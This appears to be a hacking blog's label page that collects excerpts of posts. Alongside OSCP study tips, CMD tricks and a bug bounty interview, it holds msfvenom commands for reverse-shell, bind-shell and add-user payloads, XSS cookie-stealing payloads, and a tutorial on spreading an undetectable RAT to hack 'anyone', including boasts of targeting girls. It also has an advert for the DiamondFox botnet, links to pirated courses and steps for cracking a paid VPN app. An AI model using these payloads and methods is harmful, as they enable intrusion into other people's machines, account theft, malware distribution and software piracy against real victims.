Skip to main content

Posts

Showing posts with the label hacker

All Abput Hacking course link(Exllent source for self learner)

https://www.xorrior.com/You-Have-The-Right-to-Remain-Cylance / cissp materials https://mega.nz/#F!0iYwVCoZ!PjSCPfATgBZSlQWFbrIqgg https://github.com/offensive-security/exploit-database http://cou.s3.amazonaws.com/UD3M1/swift-3-ios-10.rar https://mega.nz/#F!5UJSxLQJ!X7uO6tA35UXPtjT_ymnk9g CURSO Offensive Security Wireless Attacks - WiFu PDF: https://mega.nz/#!GIIFUB7D!fU5gFgB5g32Hk9CDHufhpXt-9DGt8IidkP3dGqYB0No PARTE 1 VIDEOS https://mega.nz/#!SQZigRxR!U65s7kUzMNx6JyO1KTSQovez06fm5Rg7XiJUR1C-HMc PARTE 2 VIDEOS https://mega.nz/#!PM43BQhA!p8muge9eaiakUHEgyMwa8o9dVKJy7fJ1mT5xsNNAMyI PARTE 3VIDEOS https://mega.nz/#!GUhyRZAQ!YicVpDyph5DFKLJqeuTjHTYAt0ESLx4Jlbj1PjKbFk4 PARTE 4 VIDEOS https://mega.nz/#!LQ4gDYRL!vfgqPUmXCykD7cPNWiQP7djEm4PijSWr1obVNN6snOc PARTE 5 VIDEOS https://mega.nz/#F!BPRm3RwJ!ESU2aM2Jd8-UE3f1xJDuSA https://mega.nz/#F!cEJwyCiS!eqvEnnoaSEdeL2J1-A47Dg : courses https://mega.nz/#F!3hJm1JxS!5crex2erSinPqDi_UPN2hA : burp suite https://mega.nz/#F!xqIijA4D!5

How to prepare for OSCP complete guide

HAX [powered by P2R]: How to prepare for OSCP complete guide Below are 5 skills which you have to improve before registering for OSCP > Learn basic of Computer Network, Web application, and Linux > Learn Bash and Python scripting > Enumeration is key in OSCP lab, I repeat Enumeration is key in OSCP Lab and in real world too > Download vulnerable VM machines from vulnhub > Buffer Overflow (BOF) exploitation Below are the free reference before registration of OSCP > https://www.cybrary.it/course/ethical-hacking / > https://www.cybrary.it/course/web-application-pen-testing / > https://www.cybrary.it/course/advanced-penetration-testing / > https://www.offensive-security.com/metasploit-unleashed / > https://www.cybrary.it/course/python / Below are the reference for Buffer overflow and exploit developmet for OSCP > http://www.fuzzysecurity.com/tutorials/ expDev /1.html > https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-p

How to Take Control of Windows Server 2003 Remotely by Launching a Reverse Shell*

HAX [powered by P2R]: *How to Take Control of Windows Server 2003 Remotely by Launching a Reverse Shell* When I left off on our last hack, we had hacked into the ubiquitous Windows Server 2003 server by adding ourselves as a user to that system so that we can return undetected at any time. The problem with this approach is that a sysadmin who is on their toes will note that a new user has been added and will begin to take preventative action. I will duly note that in small organizations with a sysadmin who wears multiple hats, the chances of this happening is small in the near term, but certainly when they get around to reviewing their logs, will notice a new user—maybe. Fortunately for us, many of the sysadmins never get around to reviewing their log files until it's too late. In this new hack, we will attempt to put a command prompt on the Server 2003 that will allow us execute command remotely on the system. Remember in our previous hack when we added ourselves as a user? I

Top 10 Best Command Prompt (CMD) Tricks And Hack

Top 10 Best Command Prompt (CMD) Tricks And Hacks 1. These commands will help you perform shutdown, restart or logoff operations with just one command. For Shut Down: shutdown -s For Restarting: shutdown -r For Logoff: shutdown -l 2. You can also shutdown your computer at a specified time by setting the time. Follow the command below. shutdown -s -t 120 3. You can print a message before you shutdown by using this command. This will be helpful to the user as a reminder or for leaving a message for the next person who will use the computer. shutdown -s -t 500 -c “i don’t want to work.” 4. We use a lot of application in our computer each with the different extension so remembering all those extensions can be hectic so use this command to check the extension of any application. Assoc 5. You can hide a folder with this command attrib +s +h D:honey In the above command honey is the name of folder, Now unhide the folder with this command attrib -s -h D:ABC 6. You can use config

Some Private Notes on Bug Hunting

Some Private Notes on Bug Hunting Aashish Kunvar Anon haxo: ########By dorkerdevil ##############                 Hope you like it #NavinYadav bro for u n for group                                                                                                                                                                                            Hack Notes echo -e "HEAD /HTTP/1.0\n\n" | nc -vv website.com echo -e "HEAD /HTTP/1.0\n\n" | openssl s_client -quit -connect website:443 nikto -p 80 -h website -verbose whisker2.1 -p 80 -h website enum all extensions: .asp,.aspx,.css,.htc,.htr,.htw,.ida,.idc,.idq,.printer,.shtm,.xml,.xsl previous version of pages:~ extensions: .bak,.old,.orig,.txt search for common directories such as:~ /bak,/inc,/old,/script SQL connection strings:~ db= dbconn= ~:xss payloads to check:~ <script>alert(document.cookie)</script> 1.attempt different embedding method: %3cscript%3e, %253cscript%253e, %00%3cscript%

Bug bounty forum

Streaak: Bug bounty forum https://bugbountyforum.com/blog/ama/nahamsec / https://bugbountyforum.com/blog/ama/yaworsk / https://bugbountyforum.com/blog/ama/jstnkndy / https://bugbountyforum.com/blog/ama/itsecurityguard / https://bugbountyforum.com/blog/ama/avlidienbrunn / @irPentesters

Listing payloads

Listing payloads msfvenom -l Windows Paylaods Reverse Shell : msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f exe > reverse.exe Bind Shell: msfvenom -p windows/meterpreter/bind_tcp RHOST= (IP Address) LPORT=(Your Port) -f exe > bind.exe Create User: msfvenom -p windows/adduser USER=attacker PASS=attacker@123 -f exe > adduser.exe CMD shell: msfvenom -p windows/shell/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f exe > prompt.exe Encoder: msfvenom -p windows/meterpreter/reverse_tcp -e shikata_ga_nai -i 3 -f exe > encoded.exe One can also use the -a to specify the architecture or the --platform Linux Payloads Reverse Shell: msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f elf >reverse.elf Bind Shell: msfvenom -p linux/x86/meterpreter/bind_tcp RHOST=(IP Address) LPORT=(Your Port) -f elf > bind.elf Generic Shell: msfvenom -p generic/shell_bind_tcp RHOST=(IP Address) LPORT=(

Lots Of Hacking Courses

/\ / \ _ __ ___ _ __ _ _ _ __ ___ _ good one__ _ _ ___ / /\ \ | '_ \ / _ \| '_ \| | | | '_ ` _ \ / _ \| | | / __| / ____ \| | | | (_) | | | | |_| | | | | | | (_) | |_| \__ \ /_/ \_\_| |_|\___/|_| |_|\__, |_| |_| |_|\___/ \__,_|___/ __/ | |___/ Courses pirated & dumped by Case & S1rlancelot irc.anonops.com/6697 #learninghub * This series of videocourses will guide you through the core material that an entry-level "ethical" hacker needs. * Go to pluralsight.com (most links here are from there) and search the course if you want to see the table of contents. * You may want to use a media player that allows you to increase the speed of the videos * The number does not mean the order in which you should follow the courses, its just the order in which they were added. * Use ?desc <coursenumber> to check the description of a course. Eg: ?desc 81 * Special thanks to ClaudiaD who haxed her way and made downloading the videos a lot easier, you rock. I also r

Some Hacking Links

How to Hack an Ethernet ADSL Router http://bit.ly/2sgAps2 How to Hack Yahoo Messenger http://bit.ly/2sgKJAm How to Create Your Own Customized Run Commands http://bit.ly/2rGyXjU What is Denial of Service (DoS) Attack? http://bit.ly/2sIybD5 How to Hack Passwords Using a USB Drive http://bit.ly/2rGfrUX How to Hack Snapchat Account http://bit.ly/2rLAcJS Hacking Someone's Facebook Password Using Some Software Or Website? No Sir You Can't! http://bit.ly/2sgv6sI Ethical Hacking Lab to Test and Learn SQL injection,XSS, CSRF Vulnerability http://bit.ly/2tie1gx List of Best sites to learn Malware Analysis http://bit.ly/2tigZBm Set up your own Lab for practicing SQL injection and XSS : Ethical Hacking_ http://bit.ly/2thYoFz List of Best Ethical Hacking / Penetration Testing Tools http://bit.ly/2rLIDoz Web Application Hacking - List Of Vulnerable Web Applicationsa http://bit.ly/2rLu6JB Phonty Review: Cell Phone Tracker With Best Features http://bit.ly/2sgIOf3 How

Hack Everything(Latest)

Anon Av: TUTORIAL: Hack anyone Facebook,email or PC.. This tutorial is like a spreading tutorial way basically. But more precise and powerful. MOSTLY I HAVE HACKED GIRLS WITH THIS METHOD (because they don't get fooled so easily by a poser and other shit. So this thing can do it) REQUIREMENTS:- 1) A fully FUD server(SERVER BEING FUD is the most important part of the hack) 2) Patience That's all... Now coming to the hack... there are basically thousands of tutorials in HF about keylogger,RAT,stealer and crypting... so read one and make your server fully fud... Now do just as what i say:- 1) go to " http://emailattack.host22.com/emailspoof.php " and leave that tab open 2) now login to your facebook and copy the username of the person(FB username) you want to hack like this.... http://imageshack.us/photo/my-images/543/username.png so basically the name after the http://www.facebook.com / is the username... in my example "RANDOM" is the username..

List of Hacking Websites and Forums:

Anon Av: List of Hacking Websites and Forums: Cybrary – Free Cyber Security Training URL:  http://www.cybrary.it Hak5 – New Hacks Every Week URL: https://hak5.orgTinkernut  URL:  http://www.tinkernut.com Cyberpunk URL:  http://n0where.net Exploit Database URL:  http://www.exploit-db.com Darknet URL:  http://www.darknet.org.uk HackADay – Fresh hack everyday URL:  http://hackaday.com Evil Zone – Hacking Community URL:  https://evilzone.org Hack this Site URL:  https://www.hackthissite.org Cellphone Hacks Forum URL: http://www.cellphonehacks.comHack Society – Grey Hat Hacking Forrum URL:  http://hacksociety.net HackForums – Hacks & Exploits URL:  http://www.hackforums.net SecuriTeam – Vulnerabilities information URL:  http://www.securiteam.com

Method For HMA(Free by Hacked)

Anon Av: PROGRAMMERdone THOD HMA Method hma pro 12 month 1- Download Lucky patcher from here : . http://lucky-patcher.ar.uptodown.com/android 2- Download Hma pro in android from Google play 2- Open Lucky patcher 3- click on the hma pro app then click Open menu of patches then create a modified apk file 4- click on the third option(apk rebuild for InApp &LVL) then click rebuild app 5-it will show please wait as it is building. Wait till it finishes. Don't touch phone screen or it will go 6- after it finishes ull see some success n error (don't worry it's all part) click go to file and click the apk select uninstall and install app 8- just wait when it finished install and go open the hma pro app 9- go sign up but first use temp mail (like mail.com getnada.com etc and get one account 10- sign up with it and close the app and open it again .. 11- when u open ull see two forms of payment, click Google play store (prices should be in decimals) click on 12 m

Setup Diamond Botnet

‌JuanDeLemos: /$$$$$$$$            /$$$$$$        /$$              /$$   | $$_____/           /$$$_  $$      | $$            /$$$$$$ | $$       /$$   /$$| $$$$\ $$  /$$$$$$$ /$$   /$$ /$$__  $$ | $$$$$   |  $$ /$$/| $$ $$ $$ /$$__  $$| $$  | $$| $$  \__/ | $$__/    \  $$$$/ | $$\ $$$$| $$  | $$| $$  | $$|  $$$$$$ | $$        >$$  $$ | $$ \ $$$| $$  | $$| $$  | $$ \____  $$ | $$$$$$$$ /$$/\  $$|  $$$$$$/|  $$$$$$$|  $$$$$$/ /$$  \ $$ |________/|__/  \__/ \______/  \_______/ \______/ |  $$$$$$/                                                    \_  $$_/                                                      \__/ DiamondFox Bot Download: for contact free +639380509517 Loader:     Core totally recoded.     Stability improved.     size Improved (18kb with configurations).     No dependencies.     Full windows compatibility (x86 and x64 from XP to Windows 10).     New cryptographic methods.     New installation routines (Bypass AVs proactives).     Domain generation a

How to Trace A Hacker(hacker got hacked)

Backtracing a RAT (Find a Hacker’s IP) Requirements: Wireshark [DOWNLOAD] Sandboxie [DOWNLOAD] First open Wireshark. Click on Wireless Network Connection or Local Area Connection (Depending on the Connection type) and click Start.  Go to the filter and type “dns”. (use “smtp” and “ftp” for keyloggers)  Now you are seeing all connections using dns. Now we are going to use sandboxie. Sandboxie is a useful tool used to analyse files before completely letting them in your system. You can run any Virus in sandboxie and once you terminate all processes your computer is not infected. So it would not add to startup or anything. Anyways, go to the RAT, right click and run in sandboxie.  Now you are infected, but the virus is trapped in sandboxie, you can easily kill the process. Please do note that the hacker can still controle your computer and view your personal information. Make sure you CLEAR ALL SAVED PASSWORDS in ALL your web browsers, RATs can easily grab your saved pass

How To Be a Real Hacker(100%)

Becoming a Real Hacker isn't a small deal. Coming to the part, you need to know about computers and computation properly to become a "Real Hacker". Sarcastically, The So - Called Ethical Hacking Certifications provided by EC-Council, (ISC)2, Offensive Security and other renowned institutes are nothing but "Scriptkiddie Production Units". Wing Hardware, Server Administration, Web Development, Client Side and Server Side Scripting, Programming, Debugging to become a "Professional Hacker" and also it takes lot of time to reach this level.  And coming to the part, when I was observed with the syllable of the "So - Called Ethical Hacking Certifications", I felt embarrassed that these certifications rely on tools and not on manual penetration testing. Mainly if you doesn't know anything about networking, Hacking will be a major hard task. 294 Views · 7 Upvotes · Answer requested by 

RAT VULNERABILITIES(Hackers got Hacked)

RAT Vulnerabilities Turn Hackers into Victims A small number of Remote Administration Tools have vulnerabilities which can enable attack targets to turn the tables on threat actors. Threat actors using certain Remote Administration Tools (RATs) may find themselves on the receiving end of malware. Newly discovered vulnerabilities in these tools may enable cybercriminals' targets to turn the tables on their attackers and deliver malware. Targeted cyberattacks hit thousands of businesses each year. Oftentimes victims label these threats as "advanced and persistent" to suggest they were inevitable, as though attackers are too sophisticated for defenders to protect themselves. In many cases this is far from the truth, argues Waylon Grange, senior threat researcher at Symantec. Vulnerabilities in multiple hacker tools can be used against threat actors. In looking at APT reports over the years, he says, there is a pattern of common RATS used in multiple campaigns. Frequentl

Hacker who earn 2.2 Crore(Bug hunter)

TECH INTERVIEW: This Indian Hacker Has Earned ₹2.2 Crore By Finding Bugs In Facebook, Twitter, And Other websites Anand Prakash is planning his own cybersecurity startup.   Dungeon Masterl ||Tech News Editor ANAND PRAKASH India has no shortage of software talent. For proof, look no further than security researcher Anand Prakash, who is in news once again for winning  a $5,000 reward from Uber after he pointed out a bug in their software that could have allowed users to take unlimited free rides. This is not the first time that Prakash has won a reward for pointing out a security flaw in a website. Over the years, he has alerted big corporations such as Facebook, Twitter and Google about potentially expensive and risky software loopholes on their websites. HuffPost India  caught up with India's top bug bounty hunter for a chat. Here are edited excerpts from the conversation — How did you get interested in hacking? In 2010, I was in Kota, taking an entrance course there.